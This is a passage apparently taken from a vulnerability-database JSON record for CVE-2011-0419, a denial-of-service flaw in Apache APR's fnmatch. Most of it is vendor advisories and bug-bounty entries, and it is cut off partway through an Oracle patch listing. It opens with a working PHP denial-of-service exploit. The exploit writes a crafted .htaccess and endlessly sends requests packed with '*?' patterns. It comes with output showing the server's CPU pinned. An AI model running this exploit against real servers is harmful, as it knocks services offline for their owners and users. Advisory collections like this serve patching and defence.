Apache/2.2.17 (Unix)\nServer built: Dec 28 2010 13:21:44\nNetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386\n\nResult:\n127# ls -la\ntotal 8\ndrwxrwxrwx 2 root wheel 512 Feb 8 21:41 .\ndrwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..\n-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess\n-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................\n-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php\n127# ps -aux -p 617\nUSER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND\nwww 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start\n\nTime = 121:43 and counting\n\nwhere http://[$localhost]:[$localport]/[$localuri]\n*/\n$localhost=\"localhost\";\n$localport=80;\n$localuri=\"/koniec/\";\n\n\nif(!is_writable(\".\")) die(\"!writable\");\n\n// Phase 1\n// Create some filename\ntouch(\"cx\".str_repeat(\".\",125));\n\n// Phase 2\n// Create .htaccess with\nunlink(\"./.htaccess\");\n$htaccess=fopen(\"./.htaccess\", \"a\");\nfwrite($htaccess,\"AddDescription \\\"CVE-2011-0419\\\" \".str_repeat('*.',512).\"\\n\");\nfclose($htaccess);\n\n// Phase 3\n// Local connect (bypass firewall restriction)\nwhile(1){\n\t$fp = fsockopen($localhost, $localport, $errno, $errstr, 30);\n\tif (!$fp) echo \"$errstr ($errno)<br />\\n\";\n\telse {\n\t\t$out = \"GET \".$localuri.\"/?P=\".str_repeat(\"*?\",1500).\"* HTTP/1.1\\r\\n\";\n\t\t$out .= \"Host: \".$localhost.\"\\r\\n\";\n\t\t$out .= \"Connection: Close\\r\\n\\r\\n\";\n\t\tfwrite($fp, $out);\n\t\tfclose($fp);\n\t}\n}\n\n?>", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/dos/35738.php", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": "The mission of the Apache Portable Runtime (APR) is to provide a free library of C data structures and routines, forming a system portability layer to as many operating systems as possible, including Unices, MS Win32, BeOS and OS/2. ", "cvss3": {}, "published": "2011-06-04T03:01:11", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: apr-1.4.5-1.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-06-04T03:01:11", "id": "FEDORA:6D8821108F8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/MD2U4ZOT3R2U7PMQ5XF6KMQMNZ6RGHZO/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "The mission of the Apache Portable Runtime (APR) is to provide a free library of C data structures and routines, forming a system portability layer to as many operating systems as possible, including Unices, MS Win32, BeOS and OS/2. ", "cvss3": {}, "published": "2012-03-01T09:35:23", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: apr-1.4.6-1.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2012-0840"], "modified": "2012-03-01T09:35:23", "id": "FEDORA:A418B218C9", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/APFZW7XICT2IH2DBZTABPXHU747B2WKJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "The mission of the Apache Portable Runtime (APR) is to provide a free library of C data structures and routines, forming a system portability layer to as many operating systems as possible, including Unices, MS Win32, BeOS and OS/2. ", "cvss3": {}, "published": "2011-06-02T19:12:11", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: apr-1.4.5-1.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-06-02T19:12:11", "id": "FEDORA:EB5D1110667", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BL4MLJKEV6CU47FMKQKTMROABR446NQV/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "The mission of the Apache Portable Runtime (APR) is to provide a free library of C data structures and routines, forming a system portability layer to as many operating systems as possible, including Unices, MS Win32, BeOS and OS/2. ", "cvss3": {}, "published": "2011-06-04T03:02:07", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: apr-1.4.5-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-06-04T03:02:07", "id": "FEDORA:EDD52110916", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/A75OMTKYZIDA5VCE3PWRQ3XWYKIQ2ZVV/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "description": "The mission of the Apache Portable Runtime (APR) is to provide a free library of C data structures and routines, forming a system portability layer to as many operating systems as possible, including Unices, MS Win32, BeOS and OS/2. ", "cvss3": {}, "published": "2011-06-02T10:55:41", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: apr-1.4.5-1.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-06-02T10:55:41", "id": "FEDORA:543461106DB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BL4MLJKEV6CU47FMKQKTMROABR446NQV/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:31:31", "description": "\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod\\_autoindex. If a directory indexed by mod\\_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\n\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.4-1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.4-1.\n\n\nWe recommend that you upgrade your apr packages and restart the\napache2 server.\n\n\n", "cvss3": {}, "published": "2011-05-15T00:00:00", "type": "osv", "title": "apr - denial of service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2022-07-21T05:47:25", "id": "OSV:DSA-2237-2", "href": "https://osv.dev/vulnerability/DSA-2237-2", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2023-06-04T16:04:39", "description": "## Releases\n\n * Ubuntu 11.04 \n * Ubuntu 10.10 \n * Ubuntu 10.04 \n * Ubuntu 8.04 \n * Ubuntu 6.06 \n\n## Packages\n\n * apache2 \\- a scalable, extensible web server\n * apr \\- The Apache Portable Runtime Library\n\nMaksymilian Arciemowicz reported that a flaw in the fnmatch() \nimplementation in the Apache Portable Runtime (APR) library could allow \nan attacker to cause a denial of service. This can be demonstrated \nin a remote denial of service attack against mod_autoindex in the \nApache web server. (CVE-2011-0419)\n\nIs was discovered that the fix for CVE-2011-0419 introduced a different \nflaw in the fnmatch() implementation that could also result in a \ndenial of service. (CVE-2011-1928)\n", "cvss3": {}, "published": "2011-05-24T00:00:00", "type": "ubuntu", "title": "APR vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-24T00:00:00", "id": "USN-1134-1", "href": "https://ubuntu.com/security/notices/USN-1134-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2023-06-04T15:13:36", "description": "### Background\n\nThe Apache Portable Runtime (aka APR) provides a set of APIs for creating platform-independent applications. The Apache Portable Runtime Utility Library (aka APR-Util) provides an interface to functionality such as XML parsing, string matching and database connections. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache Portable Runtime and APR Utility Library. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache Portable Runtime users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/apr-1.4.8-r1\"\n \n\nAll users of the APR Utility Library should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/apr-util-1.3.10\"\n \n\nPackages which depend on these libraries may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.", "cvss3": {}, "published": "2014-05-18T00:00:00", "type": "gentoo", "title": "Apache Portable Runtime, APR Utility Library: Denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928", "CVE-2012-0840"], "modified": "2014-05-18T00:00:00", "id": "GLSA-201405-24", "href": "https://security.gentoo.org/glsa/201405-24", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:33:54", "description": "This update fixes several security issues in the Apache2\n webserver.\n\n *\n\n The severe ByteRange remote denial of service attack\n (CVE-2011-3192) was fixed, configuration options used by\n upstream were added.\n\n Introduce new config option: Allow MaxRanges Number\n of ranges requested, if exceeded, the complete content is\n served. default: 200 0|unlimited: unlimited none: Range\n headers are ignored. This option is a backport from 2.2.21.\n\n *\n\n CVE-2011-0419,CVE-2011-1928: Two fnmatch denial of\n service attacks were fixed that could exhaust the servers\n memory.\n\n *\n\n CVE-2010-1623: Another memoryleak was fixed that\n could exhaust httpd server memory via unspecified methods.\n\n *\n\n CVE-2011-3368: This update also includes fixes a fix\n for a mod_proxy reverse exposure via RewriteRule or\n ProxyPassMatch directives.\n", "cvss3": {}, "published": "2011-11-09T19:08:34", "type": "suse", "title": "Security update for apache2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-3368", "CVE-2010-1623", "CVE-2011-3192", "CVE-2011-1928"], "modified": "2011-11-09T19:08:34", "id": "SUSE-SU-2011:1229-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00011.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2023-06-04T15:25:30", "description": "### *Detect date*:\n07/22/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apache httpd. Malicious users can exploit these vulnerabilities to gain privileges, cause denial of service, execute arbitrary code, obtain sensitive information or bypass security restrictions. Below is a complete list of vulnerabilities\n\n### *Affected products*:\nApache httpd 2.0 versions 2.0.64 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Apache changelog](<http://httpd.apache.org/security/vulnerabilities_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2011-3192](<https://vulners.com/cve/CVE-2011-3192>)7.8Critical \n[CVE-2013-1862](<https://vulners.com/cve/CVE-2013-1862>)5.1High \n[CVE-2012-0031](<https://vulners.com/cve/CVE-2012-0031>)4.6Warning \n[CVE-2011-0419](<https://vulners.com/cve/CVE-2011-0419>)4.3Warning \n[CVE-2011-3607](<https://vulners.com/cve/CVE-2011-3607>)4.4Warning \n[CVE-2011-3368](<https://vulners.com/cve/CVE-2011-3368>)5.0Critical \n[CVE-2012-0053](<https://vulners.com/cve/CVE-2012-0053>)4.3Warning\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {}, "published": "2013-07-22T00:00:00", "type": "kaspersky", "title": "KLA10065 Multiple vulnerabilities in Apache httpd", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-3192", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2013-1862"], "modified": "2020-06-18T00:00:00", "id": "KLA10065", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10065/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": "2023-06-04T15:37:53", "bounty": 0.0, "description": "URL https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ \nIdentified Version 2.2.15 (contains 4 important and 10 other vulnerabilities) \nLatest Version 2.2.31 \nVulnerability Database Result is based on 27.10.2016 vulnerability database content. \nVulnerability Details\n\n\nLink identified you are using an out-of-date version of Apache.\n\nImpact\n\nSince this is an old version of the software, it may be vulnerable to attacks.\n\nRemedy\n\n\nPlease upgrade your installation of Apache to the latest stable version.\n\nRemedy References\n\n\u2022Downloading the Apache HTTP Server\n\nKnown Vulnerabilities in this Version\n\n\nMedium Apache mod_cache and mod_dav Request Handling Denial of Service Vulnerability \n\nThe mod_cache and mod_dav modules in the Apache HTTP Server allow remote attackers to cause a denial of service (process crash) via a request that lacks a path. \n\nExternal References\n\u2022CVE-2010-1452 \n\nLow Apache APR-util apr_brigade_split_line() Denial of Service Vulnerability \n\nMemory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util), as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket. \n\nExternal References\n\u2022CVE-2010-1623 \n\nMedium Apache APR apr_fnmatch() Denial of Service Vulnerability\n\nStack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd. \n\nExternal References\n\u2022CVE-2011-0419\n\nExploit\n\u2022http://www.securityfocus.com/data/vulnerabilities/exploits/47820.txt\n\nMedium Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability\n\nThe byterange filter in the Apache HTTP Server allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.\n\nExternal References\n\u2022CVE-2011-3192\n\nExploit\n\u2022http://www.securityfocus.com//data/vulnerabilities/exploits/49303.c\n\u2022 http://www.securityfocus.com/data/vulnerabilities/exploits/49303-2.c\n\nImportant Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\n\nThe mod_proxy module in the Apache HTTP Server does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.\n\nExternal References\n\u2022CVE-2011-3368\n\nExploit\n\u2022http://www.securityfocus.com//data/vulnerabilities/exploits/49957.py\n\nImportant Apache HTTP Server Scoreboard Local Security Bypass Vulnerability\n\nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.\n\nExternal References\n\u2022CVE-2012-0031\n\nImportant Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. \n\nExternal References\n\u2022CVE-2011-4317\n\nImportant Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability\n\nThe mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary \"error state\" in the backend server) via a malformed HTTP request.\n\nExternal References\n\u2022CVE-2011-3348\n\nMedium mod_proxy_ajp DoS Vulnerability\n\nThe mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.\n\nExternal References\n\u2022CVE-2012-4557\n\nLow Apache Multiple XSS Vulnerability\n\nMultiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.\n\nExternal References\n\u2022CVE-2012-4558\n\nLow Apache Code Execution Vulnerability\n\nmod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.\n\nExternal References\n\u2022CVE-2013-1862\n\nLow Apache Denial of Service Vulnerabillity\n\nmod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.\n\nExternal References\n\u2022CVE-2013-1896\n\nLow Apache 'main/util.c' Denial of Service Vulnerability\n\nThe dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Server before 2.4.8 does not properly remove whitespace characters from CDATA sections, which allows remote attackers to cause a denial of service (daemon crash) via a crafted DAV WRITE request.\n\nExternal References\n\u2022CVE-2013-6438\n\nLow Apache 'mod_log_config.c' Denial of Service Vulnerability\n\nThe log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server before 2.4.8 allows remote attackers to cause a denial of service (segmentation fault and daemon crash) via a crafted cookie that is not properly handled during truncation.\n\nExternal References\n\u2022CVE-2014-0098\n", "cvss3": {}, "published": "2016-11-24T15:09:27", "type": "hackerone", "title": "U.S. Dept Of Defense: Out-of-date Version (Apache) ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0086", "CVE-2010-1452", "CVE-2010-1623", "CVE-2011-0419", "CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-4557", "CVE-2012-4558", "CVE-2013-1862", "CVE-2013-1896", "CVE-2013-6438", "CVE-2014-0098"], "modified": "2019-12-02T17:49:02", "id": "H1:184877", "href": "https://hackerone.com/reports/184877", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:55:22", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 89 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "edition": 1, "cvss3": {}, "published": "2013-07-16T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - July 2013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3769", "CVE-2013-1571", "CVE-2013-3824", "CVE-2013-3774", "CVE-2013-3749", "CVE-2013-2407", "CVE-2013-3819", "CVE-2013-3778", "CVE-2013-3788", "CVE-2013-3809", "CVE-2013-3818", "CVE-2013-3799", "CVE-2010-0434", "CVE-2010-0425", "CVE-2013-3783", "CVE-2013-3791", "CVE-2013-3768", "CVE-2013-3807", "CVE-2013-3823", "CVE-2013-3755", "CVE-2013-3753", "CVE-2011-0419", "CVE-2013-3786", "CVE-2008-2364", "CVE-2013-2451", "CVE-2013-3771", "CVE-2013-3782", "CVE-2013-3760", "CVE-2012-2687", "CVE-2013-3756", "CVE-2013-3789", "CVE-2013-3767", "CVE-2013-3811", "CVE-2013-3776", "CVE-2013-3746", "CVE-2013-3777", "CVE-2013-3750", "CVE-2013-3770", "CVE-2013-3772", "CVE-2013-3757", "CVE-2013-3787", "CVE-2013-3808", "CVE-2013-1861", "CVE-2013-3813", "CVE-2013-3775", "CVE-2013-3800", "CVE-2013-3765", "CVE-2013-3784", "CVE-2013-3759", "CVE-2013-3803", "CVE-2013-2461", "CVE-2013-3806", "CVE-2013-3745", "CVE-2013-3780", "CVE-2006-5752", "CVE-2013-3794", "CVE-2013-3758", "CVE-2010-2068", "CVE-2013-3816", "CVE-2013-3763", "CVE-2013-3810", "CVE-2013-3754", "CVE-2007-3847", "CVE-2013-3748", "CVE-2013-0398", "CVE-2013-3751", "CVE-2007-6388", "CVE-2013-3752", "CVE-2013-3764", "CVE-2013-3773", "CVE-2013-3812", "CVE-2007-5000", "CVE-2013-3781", "CVE-2013-3805", "CVE-2005-3352", "CVE-2013-3795", "CVE-2013-3820", "CVE-2013-2457", "CVE-2013-3821", "CVE-2013-3822", "CVE-2013-3761", "CVE-2013-3804", "CVE-2011-3348", "CVE-2013-3779", "CVE-2013-3825", "CVE-2013-3797", "CVE-2013-3802", "CVE-2013-3790", "CVE-2013-3796", "CVE-2013-3793", "CVE-2013-3747", "CVE-2013-3798", "CVE-2013-3801"], "modified": "2013-09-11T00:00:00", "id": "ORACLE:CPUJULY2013-1899826", "href": "https://www.oracle.com/security-alerts/cpujuly2013.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:46:47", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 87 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "edition": 1, "cvss3": {}, "published": "2012-07-17T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - July 2012", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1773", "CVE-2012-1767", "CVE-2012-3120", "CVE-2012-1738", "CVE-2011-4317", "CVE-2012-1747", "CVE-2012-1741", "CVE-2012-1766", "CVE-2012-1761", "CVE-2012-1744", "CVE-2012-1740", "CVE-2012-3117", "CVE-2001-0323", "CVE-2012-1742", 